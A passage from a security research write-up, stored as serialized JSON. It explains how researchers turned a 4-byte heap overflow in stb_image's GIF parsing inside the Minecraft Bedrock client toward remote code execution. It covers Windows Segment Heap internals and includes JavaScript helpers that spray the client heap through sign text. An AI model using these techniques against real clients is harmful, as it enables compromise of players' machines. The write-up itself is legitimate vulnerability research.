four-byte OOB write to happen, meaning we can control the first three bytes of the overflow while the last byte will always be ",{"type":24,"tag":145,"props":2354,"children":2356},{"className":2355},[],[2357],{"type":30,"value":2052},{"type":30,"value":206},{"type":24,"tag":32,"props":2360,"children":2361},{},[2362,2364,2369,2371,2377,2379,2385],{"type":30,"value":2363},"In the code we can see that size of the ",{"type":24,"tag":145,"props":2365,"children":2367},{"className":2366},[],[2368],{"type":30,"value":1127},{"type":30,"value":2370}," allocation is controlled through ",{"type":24,"tag":145,"props":2372,"children":2374},{"className":2373},[],[2375],{"type":30,"value":2376},"g->w",{"type":30,"value":2378}," and ",{"type":24,"tag":145,"props":2380,"children":2382},{"className":2381},[],[2383],{"type":30,"value":2384},"g->h",{"type":30,"value":2386}," values, both of which are read from the input file itself:",{"type":24,"tag":291,"props":2388,"children":2390},{"code":2389,"language":294,"meta":7,"className":295,"style":7},"static stbi_uc *stbi__gif_load_next(...)\n{\n [...]\n if (g->out == 0) {\n if (!stbi__gif_header(s, g, comp,0)) return 0;\n g->out = (stbi_uc *) stbi__malloc(4 * g->w * g->h);\n",[2391],{"type":24,"tag":145,"props":2392,"children":2393},{"__ignoreMap":7},[2394,2419,2426,2433,2469,2517],{"type":24,"tag":301,"props":2395,"children":2396},{"class":303,"line":304},[2397,2401,2406,2410,2414],{"type":24,"tag":301,"props":2398,"children":2399},{"style":348},[2400],{"type":30,"value":752},{"type":24,"tag":301,"props":2402,"children":2403},{"style":359},[2404],{"type":30,"value":2405}," stbi_uc ",{"type":24,"tag":301,"props":2407,"children":2408},{"style":385},[2409],{"type":30,"value":772},{"type":24,"tag":301,"props":2411,"children":2412},{"style":314},[2413],{"type":30,"value":218},{"type":24,"tag":301,"props":2415,"children":2416},{"style":359},[2417],{"type":30,"value":2418},"(...)\n",{"type":24,"tag":301,"props":2420,"children":2421},{"class":303,"line":320},[2422],{"type":24,"tag":301,"props":2423,"children":2424},{"style":359},[2425],{"type":30,"value":799},{"type":24,"tag":301,"props":2427,"children":2428},{"class":303,"line":335},[2429],{"type":24,"tag":301,"props":2430,"children":2431},{"style":359},[2432],{"type":30,"value":853},{"type":24,"tag":301,"props":2434,"children":2435},{"class":303,"line":344},[2436,2440,2444,2448,2452,2456,2461,2465],{"type":24,"tag":301,"props":2437,"children":2438},{"style":308},[2439],{"type":30,"value":868},{"type":24,"tag":301,"props":2441,"children":2442},{"style":359},[2443],{"type":30,"value":873},{"type":24,"tag":301,"props":2445,"children":2446},{"style":369},[2447],{"type":30,"value":777},{"type":24,"tag":301,"props":2449,"children":2450},{"style":359},[2451],{"type":30,"value":882},{"type":24,"tag":301,"props":2453,"children":2454},{"style":369},[2455],{"type":30,"value":1004},{"type":24,"tag":301,"props":2457,"children":2458},{"style":385},[2459],{"type":30,"value":2460}," ==",{"type":24,"tag":301,"props":2462,"children":2463},{"style":466},[2464],{"type":30,"value":685},{"type":24,"tag":301,"props":2466,"children":2467},{"style":359},[2468],{"type":30,"value":398},{"type":24,"tag":301,"props":2470,"children":2471},{"class":303,"line":401},[2472,2477,2481,2486,2491,2496,2500,2505,2509,2513],{"type":24,"tag":301,"props":2473,"children":2474},{"style":308},[2475],{"type":30,"value":2476}," if",{"type":24,"tag":301,"props":2478,"children":2479},{"style":359},[2480],{"type":30,"value":873},{"type":24,"tag":301,"props":2482,"children":2483},{"style":385},[2484],{"type":30,"value":2485},"!",{"type":24,"tag":301,"props":2487,"children":2488},{"style":314},[2489],{"type":30,"value":2490},"stbi__gif_header",{"type":24,"tag":301,"props":2492,"children":2493},{"style":359},[2494],{"type":30,"value":2495},"(s, g, comp,",{"type":24,"tag":301,"props":2497,"children":2498},{"style":466},[2499],{"type":30,"value":584},{"type":24,"tag":301,"props":2501,"children":2502},{"style":359},[2503],{"type":30,"value":2504},")) ",{"type":24,"tag":301,"props":2506,"children":2507},{"style":308},[2508],{"type":30,"value":916},{"type":24,"tag":301,"props":2510,"children":2511},{"style":466},[2512],{"type":30,"value":685},{"type":24,"tag":301,"props":2514,"children":2515},{"style":359},[2516],{"type":30,"value":492},{"type":24,"tag":301,"props":2518,"children":2519},{"class":303,"line":415},[2520,2525,2529,2533,2538,2543,2547,2551,2556,2560,2564,2568,2572,2576,2581,2585,2589,2593,2598],{"type":24,"tag":301,"props":2521,"children":2522},{"style":369},[2523],{"type":30,"value":2524}," g",{"type":24,"tag":301,"props":2526,"children":2527},{"style":359},[2528],{"type":30,"value":882},{"type":24,"tag":301,"props":2530,"children":2531},{"style":369},[2532],{"type":30,"value":1004},{"type":24,"tag":301,"props":2534,"children":2535},{"style":385},[2536],{"type":30,"value":2537}," =",{"type":24,"tag":301,"props":2539,"children":2540},{"style":359},[2541],{"type":30,"value":2542}," (stbi_uc ",{"type":24,"tag":301,"props":2544,"children":2545},{"style":385},[2546],{"type":30,"value":772},{"type":24,"tag":301,"props":2548,"children":2549},{"style":359},[2550],{"type":30,"value":911},{"type":24,"tag":301,"props":2552,"children":2553},{"style":314},[2554],{"type":30,"value":2555},"stbi__malloc",{"type":24,"tag":301,"props":2557,"children":2558},{"style":359},[2559],{"type":30,"value":362},{"type":24,"tag":301,"props":2561,"children":2562},{"style":466},[2563],{"type":30,"value":1761},{"type":24,"tag":301,"props":2565,"children":2566},{"style":385},[2567],{"type":30,"value":431},{"type":24,"tag":301,"props":2569,"children":2570},{"style":369},[2571],{"type":30,"value":897},{"type":24,"tag":301,"props":2573,"children":2574},{"style":359},[2575],{"type":30,"value":882},{"type":24,"tag":301,"props":2577,"children":2578},{"style":369},[2579],{"type":30,"value":2580},"w",{"type":24,"tag":301,"props":2582,"children":2583},{"style":385},[2584],{"type":30,"value":431},{"type":24,"tag":301,"props":2586,"children":2587},{"style":369},[2588],{"type":30,"value":897},{"type":24,"tag":301,"props":2590,"children":2591},{"style":359},[2592],{"type":30,"value":882},{"type":24,"tag":301,"props":2594,"children":2595},{"style":369},[2596],{"type":30,"value":2597},"h",{"type":24,"tag":301,"props":2599,"children":2600},{"style":359},[2601],{"type":30,"value":589},{"type":24,"tag":32,"props":2603,"children":2604},{},[2605,2607,2612,2614,2619],{"type":30,"value":2606},"And lastly, to figure out where the OOB bytes are written relative to the allocated buffer, we printed out the address range of ",{"type":24,"tag":145,"props":2608,"children":2610},{"className":2609},[],[2611],{"type":30,"value":1127},{"type":30,"value":2613}," and the value of ",{"type":24,"tag":145,"props":2615,"children":2617},{"className":2616},[],[2618],{"type":30,"value":32},{"type":30,"value":2620}," just before the OOB write happens:",{"type":24,"tag":291,"props":2622,"children":2624},{"code":2623},"g->out address range: [0x75d00d114800, 0x75d00d135800)\n[...]\np: 0x75d00d135800\n",[2625],{"type":24,"tag":145,"props":2626,"children":2627},{"__ignoreMap":7},[2628],{"type":30,"value":2623},{"type":24,"tag":32,"props":2630,"children":2631},{},[2632,2634,2639,2641,2646],{"type":30,"value":2633},"There are multiple within-bound writes to ",{"type":24,"tag":145,"props":2635,"children":2637},{"className":2636},[],[2638],{"type":30,"value":32},{"type":30,"value":2640},", but the last write happens just after the ",{"type":24,"tag":145,"props":2642,"children":2644},{"className":2643},[],[2645],{"type":30,"value":1127},{"type":30,"value":2647}," allocation.",{"type":24,"tag":80,"props":2649,"children":2651},{"id":2650},"summarizing-the-corruption",[2652],{"type":30,"value":2653},"Summarizing the Corruption",{"type":24,"tag":2655,"props":2656,"children":2657},"ul",{},[2658,2672,2700],{"type":24,"tag":2659,"props":2660,"children":2661},"li",{},[2662,2664,2670],{"type":30,"value":2663},"A single ",{"type":24,"tag":145,"props":2665,"children":2667},{"className":2666},[],[2668],{"type":30,"value":2669},"0x01",{"type":30,"value":2671}," byte write OOB",{"type":24,"tag":2659,"props":2673,"children":2674},{},[2675,2677],{"type":30,"value":2676},"4-byte OOB write just above the allocated buffer\n",{"type":24,"tag":2655,"props":2678,"children":2679},{},[2680,2685,2695],{"type":24,"tag":2659,"props":2681,"children":2682},{},[2683],{"type":30,"value":2684},"First three bytes are controllable",{"type":24,"tag":2659,"props":2686,"children":2687},{},[2688,2690],{"type":30,"value":2689},"Last byte will be ",{"type":24,"tag":145,"props":2691,"children":2693},{"className":2692},[],[2694],{"type":30,"value":2052},{"type":24,"tag":2659,"props":2696,"children":2697},{},[2698],{"type":30,"value":2699},"Size of the allocation is controlled",{"type":24,"tag":2659,"props":2701,"children":2702},{},[2703,2705],{"type":30,"value":2704},"Both corruptions are done on a short-lived allocation\n",{"type":24,"tag":2655,"props":2706,"children":2707},{},[2708,2713],{"type":24,"tag":2659,"props":2709,"children":2710},{},[2711],{"type":30,"value":2712},"Allocated just before the image-parsing process",{"type":24,"tag":2659,"props":2714,"children":2715},{},[2716],{"type":30,"value":2717},"Freed immediately upon parsing completion",{"type":24,"tag":2719,"props":2720,"children":2721},"hr",{},[],{"type":24,"tag":32,"props":2723,"children":2724},{},[2725,2727,2734,2736,2743],{"type":30,"value":2726},"Note that this bug was already found before (",{"type":24,"tag":188,"props":2728,"children":2731},{"href":2729,"rel":2730},"https://github.com/nothings/stb/issues/656",[192],[2732],{"type":30,"value":2733},"Github Issue",{"type":30,"value":2735},") but we missed it at the time. It was later fixed in ",{"type":24,"tag":188,"props":2737,"children":2740},{"href":2738,"rel":2739},"https://github.com/nothings/stb/commit/50b1bfba583b12ceb23ef949567bdd914461e524",[192],[2741],{"type":30,"value":2742},"this commit",{"type":30,"value":206},{"type":24,"tag":43,"props":2745,"children":2747},{"id":2746},"the-exploit",[2748],{"type":30,"value":2749},"The Exploit",{"type":24,"tag":32,"props":2751,"children":2752},{},[2753],{"type":30,"value":2754},"The memory corruption we had wasn't the easiest to exploit, especially on a remote target with ASLR, but it was the only one we had. We could've looked for another bug for information leaks but that wasn't interesting enough - we wanted to see if we can get RCE from the 4-byte memory corruption alone.",{"type":24,"tag":32,"props":2756,"children":2757},{},[2758],{"type":30,"value":2759},"Obviously four bytes alone aren't enough to get remote code execution in this case, so we looked for ways to turn the overflow into stronger primitives.",{"type":24,"tag":80,"props":2761,"children":2763},{"id":2762},"searching-for-better-primitives",[2764],{"type":30,"value":2765},"Searching for Better Primitives",{"type":24,"tag":32,"props":2767,"children":2768},{},[2769],{"type":30,"value":2770},"The initial idea was to use the 4‑byte OOB to overflow into adjacent heap chunk headers and attack the allocator, but we weren't familiar with Windows allocator internals at the time, so we started investigating.",{"type":24,"tag":32,"props":2772,"children":2773},{},[2774,2776,2783],{"type":30,"value":2775},"We realized that Minecraft uses the Segment Heap - Microsoft's newer heap implementation that is used by the kernel and is the default for packaged / ",{"type":24,"tag":188,"props":2777,"children":2780},{"href":2778,"rel":2779},"https://learn.microsoft.com/en-us/windows/uwp/get-started/universal-application-platform-guide",[192],[2781],{"type":30,"value":2782},"UWP",{"type":30,"value":2784}," applications (such as Minecraft Bedrock Edition).",{"type":24,"tag":80,"props":2786,"children":2788},{"id":2787},"segment-heap",[2789],{"type":30,"value":2790},"Segment Heap",{"type":24,"tag":32,"props":2792,"children":2793},{},[2794,2796,2803],{"type":30,"value":2795},"The internals of this heap implementation have been explored a number of times before (for an example in ",{"type":24,"tag":188,"props":2797,"children":2800},{"href":2798,"rel":2799},"https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Windows-Heap-Backed-Pool-The-Good-The-Bad-And-The-Encoded.pdf",[192],[2801],{"type":30,"value":2802},"this talk",{"type":30,"value":2804}," by Yarden Shafir), so we'll just summarize the two subsegment types relevant to this writeup.",{"type":24,"tag":270,"props":2806,"children":2808},{"id":2807},"low-fragmentation-heap",[2809],{"type":30,"value":2810},"Low Fragmentation Heap",{"type":24,"tag":32,"props":2812,"children":2813},{},[2814,2816,2822],{"type":30,"value":2815},"Low Fragmentation Heap (LFH) services allocations of ",{"type":24,"tag":145,"props":2817,"children":2819},{"className":2818},[],[2820],{"type":30,"value":2821},"0x3ff0",{"type":30,"value":2823}," bytes or less when LFH for that size is enabled. LFH for a given size becomes enabled after 17 consecutive allocations of that size.",{"type":24,"tag":32,"props":2825,"children":2826},{},[2827],{"type":30,"value":2828},"Most importantly for us, chunks allocated in this subsegment do not have per‑chunk headers, and data from two adjacent chunks in LFH is not separated by allocator metadata.",{"type":24,"tag":291,"props":2830,"children":2832},{"code":2831}," +-------------------------+\nChunk A ----->| 41 41 41 41 41 41 41 41 |\n | |\n | 41 41 41 41 41 41 41 41 |\n | |\n | 41 41 41 41 41 41 41 41 |\n | |\n | 41 41 41 41 41 41 41 41 |\n +-------------------------+\nChunk B ----->| 42 42 42 42 42 42 42 42 |\n | |\n | 42 42 42 42 42 42 42 42 |\n | |\n | 42 42 42 42 42 42 . . . |\n | |\n",[2833],{"type":24,"tag":145,"props":2834,"children":2835},{"__ignoreMap":7},[2836],{"type":30,"value":2831},{"type":24,"tag":32,"props":2838,"children":2839},{},[2840],{"type":30,"value":2841},"This means that the 4‑byte OOB write could overwrite the first four bytes of the next chunk above, allowing us to target heap‑allocated internal structures in Minecraft instead of the allocator - the idea being that we could find a structure that has the first field either a reference count or a length field (for example) which we could directly corrupt with the overflow.",{"type":24,"tag":270,"props":2843,"children":2845},{"id":2844},"variable-size",[2846],{"type":30,"value":2847},"Variable Size",{"type":24,"tag":32,"props":2849,"children":2850},{},[2851,2853,2859,2861,2867],{"type":30,"value":2852},"This subsegment is used for allocation sizes from ",{"type":24,"tag":145,"props":2854,"children":2856},{"className":2855},[],[2857],{"type":30,"value":2858},"0x4000",{"type":30,"value":2860}," and up to ",{"type":24,"tag":145,"props":2862,"children":2864},{"className":2863},[],[2865],{"type":30,"value":2866},"0x20_000",{"type":30,"value":2868},". Unlike LFH, the allocator will store chunk metadata in the headers of the allocated block.",{"type":24,"tag":291,"props":2870,"children":2872},{"code":2871}," +-------------------------+\n Chunk A ----->| HEAP_VS_CHUNK_HEADER |\n +-------------------------+\nChunk A Data ------------>| 41 41 41 41 41 41 41 41 |\n | |\n | 41 41 41 41 41 41 41 41 |\n | |\n | 41 41 41 41 41 41 41 41 |\n +-------------------------+\n Chunk B ----->| HEAP_VS_CHUNK_HEADER |\n +-------------------------+\nChunk B Data ------------>| 42 42 42 42 42 42 42 42 |\n | |\n | 42 42 42 42 42 42 42 42 |\n | |\n | 42 42 42 42 42 42 . . . |\n | |\n",[2873],{"type":24,"tag":145,"props":2874,"children":2875},{"__ignoreMap":7},[2876],{"type":30,"value":2871},{"type":24,"tag":32,"props":2878,"children":2879},{},[2880,2882,2888],{"type":30,"value":2881},"The header, ",{"type":24,"tag":145,"props":2883,"children":2885},{"className":2884},[],[2886],{"type":30,"value":2887},"HEAP_VS_CHUNK_HEADER",{"type":30,"value":2889},", contains information such as block size and allocation status. Crucially, this header is XORed with a secret heap key. That encoding means that, unless the heap key is leaked, faking a chunk header with an overflow is not deterministic.",{"type":24,"tag":2719,"props":2891,"children":2892},{},[],{"type":24,"tag":32,"props":2894,"children":2895},{},[2896],{"type":30,"value":2897},"At this point there were two paths to explore: use the 4‑byte overflow in LFH to target Minecraft structures, or use the overflow in VS to target the allocator.",{"type":24,"tag":32,"props":2899,"children":2900},{},[2901,2903,2910],{"type":30,"value":2902},"Targeting the allocator looked difficult because the VS chunk header is encoded. Fortunately, a ",{"type":24,"tag":188,"props":2904,"children":2907},{"href":2905,"rel":2906},"https://web.archive.org/web/20250117163016/https://labs.bluefrostsecurity.de/blog.html/2022/08/16/windows-segment-heap-attacking-the-vs-allocator/",[192],[2908],{"type":30,"value":2909},"technique published",{"type":30,"value":2911}," by Blue Frost Security describes how to abuse a 3–4 byte overflow in the VS heap to reliably produce overlapping chunks.",{"type":24,"tag":32,"props":2913,"children":2914},{},[2915],{"type":30,"value":2916},"To target Minecraft structures in LFH, we needed to find a heap‑allocated object whose first field could be forged with four bytes (or less) - candidates included a reference counter or a length field. Overwriting such a field could yield a useful primitive (e.g., a use‑after‑free from a corrupted refcount, or a larger overflow / OOB read by corrupting a length field).",{"type":24,"tag":32,"props":2918,"children":2919},{},[2920],{"type":30,"value":2921},"In either case, we needed a way to spray the heap before we could proceed.",{"type":24,"tag":80,"props":2923,"children":2925},{"id":2924},"finding-a-way-to-spray-the-heap",[2926],{"type":30,"value":2927},"Finding a Way to Spray the Heap",{"type":24,"tag":32,"props":2929,"children":2930},{},[2931],{"type":30,"value":2932},"We needed to find an object that the client allocates in response to a server-controlled action. Ideally, the server would be able to control:",{"type":24,"tag":2655,"props":2934,"children":2935},{},[2936,2941,2946,2951],{"type":24,"tag":2659,"props":2937,"children":2938},{},[2939],{"type":30,"value":2940},"The size of the allocation",{"type":24,"tag":2659,"props":2942,"children":2943},{},[2944],{"type":30,"value":2945},"The data written into the allocated buffer",{"type":24,"tag":2659,"props":2947,"children":2948},{},[2949],{"type":30,"value":2950},"The allocation’s lifetime (i.e., allocated and freed through different server actions)",{"type":24,"tag":2659,"props":2952,"children":2953},{},[2954],{"type":30,"value":2955},"The number of created objects (preferably unbounded)",{"type":24,"tag":32,"props":2957,"children":2958},{},[2959],{"type":30,"value":2960},"Not all of these conditions are strictly required, but an object satisfying all of them would be perfect for heap spraying. Eventually, we found exactly what we were looking for.",{"type":24,"tag":270,"props":2962,"children":2964},{"id":2963},"minecraft-signs",[2965],{"type":30,"value":2966},"Minecraft Signs",{"type":24,"tag":32,"props":2968,"children":2969},{},[2970],{"type":30,"value":2971},"A sign is a block in Minecraft that can display arbitrary text. There is effectively no limit to how many signs can exist in a world (aside from resource constraints), and their lifetime is fully controllable: creating a sign results in an allocation, and removing it frees the associated memory.",{"type":24,"tag":32,"props":2973,"children":2974},{},[2975,2977,2983],{"type":30,"value":2976},"What we were specifically interested in was how the client stores the text displayed on a sign. After reversing the client, we found that the text is stored in a ",{"type":24,"tag":145,"props":2978,"children":2980},{"className":2979},[],[2981],{"type":30,"value":2982},"std::string",{"type":30,"value":206},{"type":24,"tag":32,"props":2985,"children":2986},{},[2987,2989,2994],{"type":30,"value":2988},"In Microsoft’s C++ implementation, ",{"type":24,"tag":145,"props":2990,"children":2992},{"className":2991},[],[2993],{"type":30,"value":2982},{"type":30,"value":2995}," is structured roughly as follows:",{"type":24,"tag":291,"props":2997,"children":2999},{"code":2998,"language":294,"meta":7,"className":295,"style":7},"struct string\n{\n union {\n char* ptr;\n char buf[16];\n };\n size_t size;\n size_t capacity;\n};\n",[3000],{"type":24,"tag":145,"props":3001,"children":3002},{"__ignoreMap":7},[3003,3016,3023,3036,3053,3078,3086,3099,3111],{"type":24,"tag":301,"props":3004,"children":3005},{"class":303,"line":304},[3006,3011],{"type":24,"tag":301,"props":3007,"children":3008},{"style":348},[3009],{"type":30,"value":3010},"struct",{"type":24,"tag":301,"props":3012,"children":3013},{"style":359},[3014],{"type":30,"value":3015}," string\n",{"type":24,"tag":301,"props":3017,"children":3018},{"class":303,"line":320},[3019],{"type":24,"tag":301,"props":3020,"children":3021},{"style":359},[3022],{"type":30,"value":799},{"type":24,"tag":301,"props":3024,"children":3025},{"class":303,"line":335},[3026,3031],{"type":24,"tag":301,"props":3027,"children":3028},{"style":348},[3029],{"type":30,"value":3030}," union",{"type":24,"tag":301,"props":3032,"children":3033},{"style":359},[3034],{"type":30,"value":3035}," {\n",{"type":24,"tag":301,"props":3037,"children":3038},{"class":303,"line":344},[3039,3044,3048],{"type":24,"tag":301,"props":3040,"children":3041},{"style":348},[3042],{"type":30,"value":3043}," char",{"type":24,"tag":301,"props":3045,"children":3046},{"style":385},[3047],{"type":30,"value":772},{"type":24,"tag":301,"props":3049,"children":3050},{"style":359},[3051],{"type":30,"value":3052}," ptr;\n",{"type":24,"tag":301,"props":3054,"children":3055},{"class":303,"line":401},[3056,3060,3065,3069,3074],{"type":24,"tag":301,"props":3057,"children":3058},{"style":348},[3059],{"type":30,"value":3043},{"type":24,"tag":301,"props":3061,"children":3062},{"style":369},[3063],{"type":30,"value":3064}," buf",{"type":24,"tag":301,"props":3066,"children":3067},{"style":359},[3068],{"type":30,"value":541},{"type":24,"tag":301,"props":3070,"children":3071},{"style":466},[3072],{"type":30,"value":3073},"16",{"type":24,"tag":301,"props":3075,"children":3076},{"style":359},[3077],{"type":30,"value":1423},{"type":24,"tag":301,"props":3079,"children":3080},{"class":303,"line":415},[3081],{"type":24,"tag":301,"props":3082,"children":3083},{"style":359},[3084],{"type":30,"value":3085}," };\n",{"type":24,"tag":301,"props":3087,"children":3088},{"class":303,"line":439},[3089,3094],{"type":24,"tag":301,"props":3090,"children":3091},{"style":348},[3092],{"type":30,"value":3093}," size_t",{"type":24,"tag":301,"props":3095,"children":3096},{"style":359},[3097],{"type":30,"value":3098}," size;\n",{"type":24,"tag":301,"props":3100,"children":3101},{"class":303,"line":447},[3102,3106],{"type":24,"tag":301,"props":3103,"children":3104},{"style":348},[3105],{"type":30,"value":3093},{"type":24,"tag":301,"props":3107,"children":3108},{"style":359},[3109],{"type":30,"value":3110}," capacity;\n",{"type":24,"tag":301,"props":3112,"children":3113},{"class":303,"line":476},[3114],{"type":24,"tag":301,"props":3115,"children":3116},{"style":359},[3117],{"type":30,"value":3118},"};\n",{"type":24,"tag":32,"props":3120,"children":3121},{},[3122,3124,3130,3132,3138],{"type":30,"value":3123},"We are primarily interested in the union: ",{"type":24,"tag":145,"props":3125,"children":3127},{"className":3126},[],[3128],{"type":30,"value":3129},"buf",{"type":30,"value":3131}," is used when the string fits within 16 bytes, while ",{"type":24,"tag":145,"props":3133,"children":3135},{"className":3134},[],[3136],{"type":30,"value":3137},"ptr",{"type":30,"value":3139}," points to a heap-allocated buffer if the string exceeds that size. The allocated buffer contains only the string’s raw bytes.",{"type":24,"tag":32,"props":3141,"children":3142},{},[3143],{"type":30,"value":3144},"This means that for each sign whose text is longer than 16 bytes, the client allocates a heap buffer equal to the string length.",{"type":24,"tag":32,"props":3146,"children":3147},{},[3148],{"type":30,"value":3149},"This makes signs perfect for our needs - we can fully control the allocation size, lifetime, and contents of the heap buffer.",{"type":24,"tag":270,"props":3151,"children":3153},{"id":3152},"spraying-with-server-side-scripting",[3154],{"type":30,"value":3155},"Spraying With Server-Side Scripting",{"type":24,"tag":32,"props":3157,"children":3158},{},[3159],{"type":30,"value":3160},"The simplest way to automatically manipulate the world is through server-side behavior packs. These packs are written in JavaScript and can control many aspects of the server.",{"type":24,"tag":32,"props":3162,"children":3163},{},[3164,3166,3172,3173,3179],{"type":30,"value":3165},"We wrote ",{"type":24,"tag":145,"props":3167,"children":3169},{"className":3168},[],[3170],{"type":30,"value":3171},"alloc",{"type":30,"value":2378},{"type":24,"tag":145,"props":3174,"children":3176},{"className":3175},[],[3177],{"type":30,"value":3178},"free",{"type":30,"value":3180}," helpers that trigger an allocation in the client and free it on demand:",{"type":24,"tag":291,"props":3182,"children":3186},{"code":3183,"language":3184,"meta":7,"className":3185,"style":7},"// Allocate sign text in the client\nfunction alloc(size, fill=\"A\") {\n for (let sign of signs) {\n if (sign.allocated || sign.removed) {\n continue;\n }\n\n sign.sign.setText(fill.repeat(size - 1));\n sign.allocated = true;\n return sign;\n }\n\n console.warn(\"No more allocs\");\n return undefined;\n}\n\n// Free an allocated sign in the client\nfunction free(sign) {\n if (sign == undefined || sign.allocated == false) {\n return;\n }\n\n sign.sign.setText(\"\");\n sign.allocated = false;\n\n sign.block.setPermutation(\n BlockPermutation.resolve(\"minecraft:air\")\n );\n sign.removed = true;\n}\n","javascript","language-javascript shiki shiki-themes slack-dark",[3187],{"type":24,"tag":145,"props":3188,"children":3189},{"__ignoreMap":7},[3190,3198,3242,3278,3326,3338,3346,3353,3417,3445,3460,3467,3474,3504,3520,3527,3534,3542,3566,3618,3629,3637,3645,3683,3711,3719,3749,3780,3789,3817],{"type":24,"tag":301,"props":3191,"children":3192},{"class":303,"line":304},[3193],{"type":24,"tag":301,"props":3194,"children":3195},{"style":1062},[3196],{"type":30,"value":3197},"// Allocate sign text in the client\n",{"type":24,"tag":301,"props":3199,"children":3200},{"class":303,"line":320},[3201,3206,3211,3215,3220,3224,3229,3233,3238],{"type":24,"tag":301,"props":3202,"children":3203},{"style":348},[3204],{"type":30,"value":3205},"function",{"type":24,"tag":301,"props":3207,"children":3208},{"style":314},[3209],{"type":30,"value":3210}," alloc",{"type":24,"tag":301,"props":3212,"children":3213},{"style":359},[3214],{"type":30,"value":362},{"type":24,"tag":301,"props":3216,"children":3217},{"style":369},[3218],{"type":30,"value":3219},"size",{"type":24,"tag":301,"props":3221,"children":3222},{"style":359},[3223],{"type":30,"value":377},{"type":24,"tag":301,"props":3225,"children":3226},{"style":369},[3227],{"type":30,"value":3228},"fill",{"type":24,"tag":301,"props":3230,"children":3231},{"style":385},[3232],{"type":30,"value":523},{"type":24,"tag":301,"props":3234,"children":3235},{"style":329},[3236],{"type":30,"value":3237},"\"A\"",{"type":24,"tag":301,"props":3239,"children":3240},{"style":359},[3241],{"type":30,"value":398},{"type":24,"tag":301,"props":3243,"children":3244},{"class":303,"line":335},[3245,3250,3254,3259,3264,3269,3274],{"type":24,"tag":301,"props":3246,"children":3247},{"style":308},[3248],{"type":30,"value":3249}," for",{"type":24,"tag":301,"props":3251,"children":3252},{"style":359},[3253],{"type":30,"value":873},{"type":24,"tag":301,"props":3255,"children":3256},{"style":348},[3257],{"type":30,"value":3258},"let",{"type":24,"tag":301,"props":3260,"children":3261},{"style":369},[3262],{"type":30,"value":3263}," sign",{"type":24,"tag":301,"props":3265,"children":3266},{"style":348},[3267],{"type":30,"value":3268}," of",{"type":24,"tag":301,"props":3270,"children":3271},{"style":369},[3272],{"type":30,"value":3273}," signs",{"type":24,"tag":301,"props":3275,"children":3276},{"style":359},[3277],{"type":30,"value":398},{"type":24,"tag":301,"props":3279,"children":3280},{"class":303,"line":344},[3281,3286,3290,3295,3299,3304,3309,3313,3317,3322],{"type":24,"tag":301,"props":3282,"children":3283},{"style":308},[3284],{"type":30,"value":3285}," if",{"type":24,"tag":301,"props":3287,"children":3288},{"style":359},[3289],{"type":30,"value":873},{"type":24,"tag":301,"props":3291,"children":3292},{"style":369},[3293],{"type":30,"value":3294},"sign",{"type":24,"tag":301,"props":3296,"children":3297},{"style":359},[3298],{"type":30,"value":206},{"type":24,"tag":301,"props":3300,"children":3301},{"style":369},[3302],{"type":30,"value":3303},"allocated",{"type":24,"tag":301,"props":3305,"children":3306},{"style":385},[3307],{"type":30,"value":3308}," ||",{"type":24,"tag":301,"props":3310,"children":3311},{"style":369},[3312],{"type":30,"value":3263},{"type":24,"tag":301,"props":3314,"children":3315},{"style":359},[3316],{"type":30,"value":206},{"type":24,"tag":301,"props":3318,"children":3319},{"style":369},[3320],{"type":30,"value":3321},"removed",{"type":24,"tag":301,"props":3323,"children":3324},{"style":359},[3325],{"type":30,"value":398},{"type":24,"tag":301,"props":3327,"children":3328},{"class":303,"line":401},[3329,3334],{"type":24,"tag":301,"props":3330,"children":3331},{"style":308},[3332],{"type":30,"value":3333}," continue",{"type":24,"tag":301,"props":3335,"children":3336},{"style":359},[3337],{"type":30,"value":492},{"type":24,"tag":301,"props":3339,"children":3340},{"class":303,"line":415},[3341],{"type":24,"tag":301,"props":3342,"children":3343},{"style":359},[3344],{"type":30,"value":3345}," }\n",{"type":24,"tag":301,"props":3347,"children":3348},{"class":303,"line":439},[3349],{"type":24,"tag":301,"props":3350,"children":3351},{"emptyLinePlaceholder":16},[3352],{"type":30,"value":341},{"type":24,"tag":301,"props":3354,"children":3355},{"class":303,"line":447},[3356,3361,3365,3369,3373,3378,3382,3386,3390,3395,3399,3403,3408,3412],{"type":24,"tag":301,"props":3357,"children":3358},{"style":369},[3359],{"type":30,"value":3360}," sign",{"type":24,"tag":301,"props":3362,"children":3363},{"style":359},[3364],{"type":30,"value":206},{"type":24,"tag":301,"props":3366,"children":3367},{"style":369},[3368],{"type":30,"value":3294},{"type":24,"tag":301,"props":3370,"children":3371},{"style":359},[3372],{"type":30,"value":206},{"type":24,"tag":301,"props":3374,"children":3375},{"style":314},[3376],{"type":30,"value":3377},"setText",{"type":24,"tag":301,"props":3379,"children":3380},{"style":359},[3381],{"type":30,"value":362},{"type":24,"tag":301,"props":3383,"children":3384},{"style":369},[3385],{"type":30,"value":3228},{"type":24,"tag":301,"props":3387,"children":3388},{"style":359},[3389],{"type":30,"value":206},{"type":24,"tag":301,"props":3391,"children":3392},{"style":314},[3393],{"type":30,"value":3394},"repeat",{"type":24,"tag":301,"props":3396,"children":3397},{"style":359},[3398],{"type":30,"value":362},{"type":24,"tag":301,"props":3400,"children":3401},{"style":369},[3402],{"type":30,"value":3219},{"type":24,"tag":301,"props":3404,"children":3405},{"style":385},[3406],{"type":30,"value":3407}," -",{"type":24,"tag":301,"props":3409,"children":3410},{"style":466},[3411],{"type":30,"value":487},{"type":24,"tag":301,"props":3413,"children":3414},{"style":359},[3415],{"type":30,"value":3416},"));\n",{"type":24,"tag":301,"props":3418,"children":3419},{"class":303,"line":476},[3420,3424,3428,3432,3436,3441],{"type":24,"tag":301,"props":3421,"children":3422},{"style":369},[3423],{"type":30,"value":3360},{"type":24,"tag":301,"props":3425,"children":3426},{"style":359},[3427],{"type":30,"value":206},{"type":24,"tag":301,"props":3429,"children":3430},{"style":369},[3431],{"type":30,"value":3303},{"type":24,"tag":301,"props":3433,"children":3434},{"style":385},[3435],{"type":30,"value":2537},{"type":24,"tag":301,"props":3437,"children":3438},{"style":348},[3439],{"type":30,"value":3440}," 